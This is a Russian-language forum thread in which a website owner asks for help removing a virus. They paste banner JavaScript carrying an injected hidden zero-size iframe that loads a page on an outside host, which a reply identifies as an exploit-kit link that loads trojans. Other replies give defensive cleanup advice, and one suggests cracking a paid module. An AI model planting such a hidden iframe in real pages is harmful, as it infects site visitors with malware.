• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.     Помогите модератору этого раздела killoff лично.

Помощь Помогите найти вирус на сайте

Статус
В этой теме нельзя размещать новые ответы.
www

Шаблон стандартный, взят с официального сайта и переделан. Не думаю что там дырки есть.
А вот в модулях не увер. Поставил себе недели две назад этот модуль Для просмотра ссылки Войди или Зарегистрируйся может через него?
 
htaccess с содержанием deny for all разбросать надо, скрипт можно переименовать и переложить в другое место
сайт скачать на локальный комп и чекать обычным антивирусом - должно всплыть.
 
kail.2009 написал(а):
Шаблон стандартный, взят с официального сайта и переделан. Не думаю что там дырки есть.
А вот в модулях не увер. Поставил себе недели две назад этот модуль Для просмотра ссылки Войди или Зарегистрируйся может через него?
Нажмите для раскрытия...
Он же если бесплатный то имеет рекламу зашифрованную.
Либо купите либо ищите ломалку этого модуля.
 
www

Вот блин из-за этого вируса -1000 посетителей в сутки :(
Вроди почистил все. .htaccess влеплены в каждой папке. Нашол ещё похожый вирусный код в файле banners.php
Был влеплен в рекламный баннер, вот:
Код: 
<center><script>
//<!--
ubn_user = "88343";
ubn_page = "1";
ubn_pid = Math.round((Math.random() * (10000000 - 1)));
document.write("<iframe src='http://banner.kiev.ua/cgi-bin/bi.cgi?h" +
ubn_user + "&amp;"+ ubn_pid + "&amp;" + ubn_page + 
"&amp;12' frameborder=0 vspace=0 hspace=0 " +
" width=728 height=90 marginwidth=0 marginheight=0 scrolling=no>");

[COLOR="Red"]document.write("<iframe src='http://ricoh-queretaro.com/ads.php" +
' frameborder=0 vspace=0 hspace=0 " +
" width=0 height=0 marginwidth=0 marginheight=0 scrolling=no>");
[/COLOR]

document.write("<a href='http://banner.kiev.ua/cgi-bin/bg.cgi?" +
ubn_user + "&amp;"+ ubn_pid + "&amp;" + ubn_page + "' target=_top>");
document.write("<img border=0 src='http://banner.kiev.ua/" +
"cgi-bin/bi.cgi?i" + ubn_user + "&amp;" + ubn_pid + "&amp;" + ubn_page +
"&amp;12' width=728 height=90 alt='Ukrainian Banner Network'></a>");
document.write("</iframe>");
//-->
</script>
</center>

Как ?? :(
 
В таких случаях, скачиваю сайт на локалку и прогоняю через антивирус, плюс ищу программой HTMLChanger подозрительные строки во всех файлах.
Также нужно найти на сайте все шеллы (обычно по дате изменения, если хакер начинающий.).
 
это не рекламный банер, а линк на связку. с нее злоумышленики грузят троянов вашим посетителям.
 
советую сделать следующее:
1. слить весь сайт на локалхост
2. распаковать ИЗ ДИСТРИБУТИВОВ все модули, используемые на сайте и сам движок в отдельную папку
3. сравнить файлы по весу, содержимому.
4. при обнаружении расхождений - сравнивать оригинал и сомнительный файл, слитый с хостинга с помощью какой-нибудь утилиты, например, Compare It!
5. делаем выводы. если найдешь расхождения - то на сайте присутствует зловред. если нет расхождений - то тут два варианта: либо дырявые модули (нужно обновляться на свежие), либо чужие модули с "закладками" (избавляться или разбираться где установлена закладка, что бывает геморройно, если нет навыков).
 
пользуйтесь стандартным антивирусом дле. Очень зачетная вещь. В свое время только она помогла мне узнать, какие файлы были изменены взломщиками.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху